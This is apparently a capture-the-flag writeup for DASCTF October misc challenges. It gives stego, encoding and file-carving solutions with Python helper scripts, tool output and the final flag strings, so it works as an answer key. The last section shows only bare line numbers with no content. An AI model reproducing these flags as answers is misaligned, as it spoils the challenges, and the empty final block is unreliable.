DASCTF Oct X writeup

misc

WELCOME DASCTFxJlenu

hsctf A Simple Conversation改的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python3
from time import sleep
print("Hello! CTFer!")
sleep(1)
print("Welcome to Dasctf x Jlenu.")
sleep(1)
print("Plz input your name")
age = input("> ")
sleep(1)
print("Wow!")
sleep(1)
print("Hello %s " % age)
sleep(1)
print("Give your gift https://www.youtube.com/watch?v=dQw4w9WgXcQ")

give your flag

循环解压

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import os
import zipfile
#os.system('rm das10/giveyourflag/.DS_Store')
while True:
filePath = 'das10/giveyourflag/'
#将文件夹下文件名生成list
filelist = os.listdir(filePath)
for i in range(len(filelist)):
#print(filelist[i])
zipname = filePath + filelist[i]
print(zipname)
#判断是否为zip文件
if zipfile.is_zipfile(zipname):
#解压
z = zipfile.ZipFile(zipname, 'r')
#解压到指定目录
z.extractall('giveyourflag')
#删除对应zip文件
os.system('rm ' + zipname)
else:
os.system('cat '+ zipname)
exit()
#R0RWRldJezdnZ3FnbGwzanl1a2RuY3N0aTlpY3BjM2ZlYjB2NW9wfQ==
#base64,凯撒爆
#DASCTF{7ddndii3gvrhakzpqf9fzmz3cby0s5lm}

闯入魔塔的魔法少女

binwalk解压直接搜flag

魔法少女的迷音

压缩包备注

1
2
nIhtnmTm+m0a+m0a0lA5LIA5LIA5LIA5LIA5LIA5LIA5LIA5LIA5L/CC
atom128

对其进行atom128解密得压缩包密码

1
passswowoowowddddddddddddddddddddddddddd

对音频倒放得到一组数据,此处有个坑,比如听到的是151,其实是100,51

1
100,51,55,97,51,49,53,54,48,98,100,53,100,53,51,100,50,50,48,99,57,97,52,57,50,102,97,153,54,48,49

Decimal解密得flag

1
DASCTF{d37a31560bd5d53d220c9a492fad5601}

魔法秘文

formost分离图片得压缩包,其中一个文件未加密,为ttf文件,压缩包备注提示密码由32个中文组成
ttf文件尾发现url编码信息

1
二十丁厂七卜人入八九几儿了力乃刀又三于干亏士工土才寸下大丈与万上小口巾山千乞川亿个勺久凡及夕丸么广亡门义之尸弓己已子卫也女飞刃习叉马乡丰王井开夫天无元专云扎艺木五支厅不太犬区历尤友匹车巨牙屯比互切瓦止少日中冈贝内水见午牛手毛气升长仁什片仆化仇币仍仅斤爪反介父从今凶分乏公仓月氏勿欠风丹匀乌凤勾文六方火为斗忆订计户认心尺引丑巴孔队办以允予劝双书幻玉刊示末未击打巧正扑扒功扔去甘世古节本术可丙左厉右石布龙

安装字体,使用该字体显示发现部分文字进行了旋转

挑出异常文字

1
丁厂八九几刀于干工上小个门之马王云木尤切少牛分六方丑玉古节可石布

解压得flag

1
DASCTF{4b7e33769d9bd2b7dbc1790ae39397b9}

不可以色色

根据提示,下载到video.zip
解压对比正常mp4文件头,修复,这里要把0x40个字节换掉

逐帧看获得二维码


第二个图旋转180度与第一个图进行拼接得PDF417码

解码得flag

1
DASCTF{8e2d479e26b3093651293f9fa26e3404}

魔法信息

追踪tcp流可以发现有个zip

提取出来解压得pdf,会有报错,010查看,在数据块里查看到flag

1
DASCTF{25da50b7993c0db55867a5a51f32f35c}

阴游大师

zip解压,提取信息

1
2
3
4
5
6
7
8
import json
fp = open('1634029079.mc', 'r')
data = fp.read()
json1 = json.loads(data)
note = json1['note']
for i in note:
print(i['column'], end='')
#11111366666622222555554525314372631372324234362423535353536271803535647352356011234235355353553877665563543543354512671267011256235425366424423162365417000068658367847012387111119951214811795651141019510911711510599951039710910195109971151160111141250000000031234610053251245332040404026262621267126712671267126712671267126712671267012301230123567856782344532356235623564444444444172635080808081701782662662660220222436436527845645736413737537526215707406754545423452525258765432107766554433112221212676762323246123455335353357654335535335301246786345325325326342660172462318504536141652723643725325252525252536363636271627162716271627162716245245246317258312612125876248761876234617635623561820324132546352434253226026826272526452736508551735534260463065632660582163806647051446017826713521835105287647163735363528353250364634351354444345434

将0000到00000000的数据提取,decimal得flag

1
68 65 83 67 84 70 123 87 111 119 95 121 48 117 95 65 114 101 95 109 117 115 105 99 95 103 97 109 101 95 109 97 115 116 011 114 125
1
2
3
DASCTF{Wow_y0u_Are_music_game_mast.r}
#出题人失误,101打成了011,手动改一下
DASCTF{Wow_y0u_Are_music_game_master}

英语不好的魔法少女

发现隐藏信息

提取内容
零宽字节解密得密文

1
yjPW8RIz0og8HX3o6BcwTmveeyyEDiCurJNTwPJeY/PMyOhHXYVKPLln6isBRyL0

其中很多单词拼写错误,使用单词表筛选,注意,原隐藏文件有宽字节,需要strings过滤一下

1
strings stego_text.txt > text.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
fp = open('text.txt', 'r')
fs = open('google-10000-english.txt', 'r')
tables = []
for line in fs:
line = line.strip('\n')
tables.append(line)
data = []
for line in fp:
line = line.strip('\n')
data.append(line)
for s in data:
if s not in tables:
print(s)
1
2
3
4
5
6
7
8
9
10
11
12
13
accuratm
extfnt
biks
equivalens
openev
sendinx
foumula
fecused
journsy
threht
oparational
handbnok
sguthwest

提取错误字母,过滤重复字符,得key

1
mfsvxueshang

aes解密得flag

1
DASCTF{7rql7tzog7pexynd2z3hxfpg4lyt6sr}

第23秒第24帧及第52秒有二维码


https://merricx.github.io/qrazybox 读取部分信息,在gitee找到项目
https://gitee.com/snowywar/gege
4444.png找到网址,twitter.jpg分离出加密zip,利用解压得密文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ zsteg 4444.png
imagedata .. file: MIPSEL-BE MIPS-II ECOFF executable not stripped - version 2.1
b1,rgb,lsb,xy .. text: "https://ja.m.wikipedia.org/wiki/%E6%AD%BB\t"
b2,r,msb,xy .. file: PGP Secret Key -
b2,g,lsb,xy .. text: "Cg\t_@E@F"
b2,b,lsb,xy .. text: "ANPv@]Q]"
b2,b,msb,xy .. file: PGP Secret Sub-key -
b3,b,msb,xy .. text: "8fDH\\,@s"
❯ binwalk -e twitter.jpg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 850 x 623, 8-bit colormap, non-interlaced
180817 0x2C251 Zip archive data, encrypted at least v2.0 to extract, compressed size: 44, uncompressed size: 32, name: flag.txt
180989 0x2C2FD End of Zip archive, footer length: 22
cd _twitter.jpg.extracted
❯ unzip -P "$(echo -n 死|iconv -f utf-8 -t gbk)" 2C251.zip
Archive: 2C251.zip
extracting: flag.txt
❯ cat flag.txt
=6270yFdE0<?@H0=@G60562C=J0v60v6%

rot47得flag

1
leaf_Ju5t_know_love_dearly_Ge_GeT

虚幻3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from PIL import Image
pic = Image.open('虚幻3.bmp')
a, b = pic.size
r1 = [] # 储存r、g、b通道
g1 = []
b1 = []
r2 = [] # 一行一行临时储存
g2 = []
b2 = []
for y in range(b):
for x in range(a):
r2.append(pic.getpixel((x, y))[0] % 2)
g2.append(pic.getpixel((x, y))[1] % 2)
b2.append(pic.getpixel((x, y))[2] % 2)
r1.append(r2)
g1.append(g2)
b1.append(b2)
r2 = []
g2 = []
b2 = []
pic_1 = Image.new('L', (a, b*3), 255)
for y in range(0, len(r1)*3, 3):
for x in range(len(r1[0])):
pic_1.putpixel((x, y), g1[y//3][x] * 255)
pic_1.putpixel((x, y+1), r1[y//3][x] * 255)
pic_1.putpixel((x, y+2), b1[y//3][x] * 255)
pic_1.show()
pic_1.save('flag.bmp')


加外围特征,扫码得flag

1
DASCTF{13833babbd434be3e2882f507ce5f8ae}

Twinkle Twinkle Starry Night

1
ICAgICArICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICArKiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAKKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiArICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsKKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogKyAuICAgICArICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICsgICAgICAKICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAKKyogICAgICAgLiArICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsKICAqICAgICArKiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAKICAgKyAgKiAgICAgICArKiogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAKICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAKICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICAKKyAgKiAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAuICAgICAgIC4gKyAgICAKICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICArKiAKKiArIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAKICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAKICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAKICAgICsqICAgICAgICArICAqICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgIC4gICAgICAgLiAgICAgICAuICsgICAuICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAKICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICArKiArIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyoKICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICAKKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICArICAgICAKICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICsgICAgICAgICsgICoKICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAKICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgLiAgIC4gICAuICsgLiAgICAgKyAgICAgICAKICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICAKKyogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAKICAgICsqICAgICArICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICArKiAKICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICAKKyAgKiAgICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAKICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyoKICAgICAuICAgICAuICAgICAuICAgICAuICsgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAKICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAKICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICArKiAKICAgICAgICsgICogICAgICsqIC4gLiArICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAKICArKiAgICAgICAgKyAgKiAgICAgKyogKyAgICAgICAuICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICoKICAgICAgKyogICAgICAgICsgICogICAgICArKiogKyAgICAgLiAgICAgKyAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsKICAqICAgICArKiAgICAgICAgKyAgKiAgICAgKyogKyAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAKICogICAgICAgKyogICAgICAgICsgICogICAgICArKiArICAgICAuICAgICArICAgICAgICArICAqICAgICAgICsqKiArICAgLiAgICAgKyAgICAgICAgKyAgKiAKICAgICArKiAgICAgICAgKyAgKiAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAKKyAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICsgICAKICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICAgKyogICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgKyAgICAgICAKICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgIC4gICAgICAgLiAKICAgICAgLiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAgKyAgKiAgICAgICsqICAgICAgICArICAqICAgICAgKyogICAgICAgICsKICAqICAgICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICArICAgICAgICArICAqICAgICAgKyogICAgICAgICsgICogICAgICsqICAgICAgICArICAqICAKICAgICsqICAgICAgICArICAqICAgICAgICsqICAgICAgICArICAqICAgICAgKyogLiArICAgICAgIC4gICAgICsgICAgICAgICsgICogICAgICArKiAgICAgICAKICsgICogICAgICsqICAgICAgICArICAqICAgICAgKyogKyAgIC4=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
+     +        +  *      +*        +  *     +*        +  *       +*        +  *      +*
+ * +* + . + + * +* + * +* + *
+* + * +* + * +* + . + + * +* + * +
* + * +* + * +* + * +* + . + + * +*
+ * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* + *
+* . + . + + * +* + * +* + * +* +
* +* + . + + * +* + * +* + * +*
+ * +** + . + + * +* + * +* + * +*
+ * +* + * +* + . + + * +* + *
+* + * +* + * +* + * +* + + * +*
+ * +* + * +* + * +* + + * +*
+ * +* + * +* + * +* + * +* . . +
. + + * +* + * +* + * +* + * +*
* + . + + * +* + * +* + * +* + * +*
+ * +* + + * +* + * +* + * +*
+ * +* + * +* + + * +* + * +* + *
+* + * +* + + * +* + * +* + * +*
+ * +* . . . + . + + * +* + *
+* + * +* + * +* + . + + * +* + * +*
+ * +* + * +* + * +* + . + + *
+* + * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* + + *
+* + * +* + * +* + * +* + + *
+* + * +* + * +* + * +* . . . + . +
+ * +* + * +* + * +* + * +* + *
+* + . + + * +* + * +* + * +* + *
+* + + * +* + * +* + * +* + * +*
+ + * +* + * +* + * +* + * +*
+ * +* + + * +* + * +* + * +* + *
+* + + * +* + * +* + * +* + * +*
. . . . + . + + * +* + * +* + *
+* + * +* + + * +* + * +* + *
+* + * +* + + * +* + * +* + * +*
+ * +* . . + . + + * +* + * +* + *
+* + * +* + . + + * +* + * +* + *
+* + * +** + . + + * +* + * +* +
* +* + * +* + . + + * +* + * +* +
* +* + * +* + . + + * +** + . + + *
+* + * +* + * +* + * +* + * +*
+ + * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* +
+ * +* + * +* + * +* + * +* . .
. + . + + * +* + * +* + * +* +
* +* + * +* + + * +* + * +* + *
+* + * +* + * +* . + . + + * +*
+ * +* + * +* + .

starry语言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import sys
fp = open('Twinkle.txt')
data = fp.read()
fs = open('TwinkleTwinkle.txt', 'w')
sub = 0
for i in data:
# print(i)
if i == '\n':
continue
elif i == ' ':
sub += 1
elif i == '+':
if sub == 1:
fs.write('dup\n')
sub = 0
elif sub == 2:
fs.write('swap\n')
sub = 0
elif sub == 3:
fs.write('rotate\n')
sub = 0
elif sub == 4:
fs.write('pop\n')
sub = 0
else:
fs.write('push ' + str(sub-5) + '\n')
sub = 0
elif i == '*':
if sub == 0:
fs.write('+\n')
sub = 0
elif sub == 1:
fs.write('-\n')
sub = 0
elif sub == 2:
fs.write('*\n')
sub = 0
elif sub == 3:
fs.write('/\n')
sub = 0
elif sub == 4:
fs.write('%\n')
sub = 0
else:
print('error!!!')
sub = 0
sys.exit()
elif i == '.':
if sub == 0:
fs.write('num_out\n')
else:
fs.write('char_out\n')
sub = 0
else:
print('error!!!!')
sys.exit()
fp.close()
fs.close()

得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
push  0
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 0
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 2
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 2
+
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 0
+
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 1
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 0
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 1
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
push 3
*
push 2
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 1
+
push 3
*
push 0
+
push 0
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 0
+
push 3
*
push 2
+
push 0
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 1
+
push 3
*
push 0
+
char_out
char_out
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 2
+
push 3
*
push 2
+
dup
char_out
push 0
push 3
*
push 1
+
push 3
*
push 1
+
push 3
*
push 0
+
push 3
*
push 2
+
push 3
*
push 1
+
-
dup
char_out

再对栈操作指令脚本操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sys
fp = open('TwinkleTwinkle.txt', 'r')
data = []
for line in fp:
line = line.strip('\n')
if line[:4] == 'push':
data.append(int(line.split(' ')[1]))
elif line == '*':
x = data[-1]
y = data[-2]
data = data[:-2]
data.append(x * y)
elif line == '+':
x = data[-1]
y = data[-2]
data = data[:-2]
data.append(x + y)
elif line == 'dup':
x = data[-1]
data.append(x)
elif line == 'char_out':
x = data[-1]
data = data[:-1]
print(str(x) + ' ', end='')
else:
print('error!!!')
sys.exit()

1
102 108 97 103 123 51 53 52 101 55 49 99 101 45 48 99 56 48 45 52 102 101 54 45 56 57 54 52 45 56 99 101 55 102 55 53 49 102 48 101 57 125

decimal得flag

1
flag{354e71ce-0c80-4fe6-8964-8ce7f751f0e9}

卡比卡比卡比

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
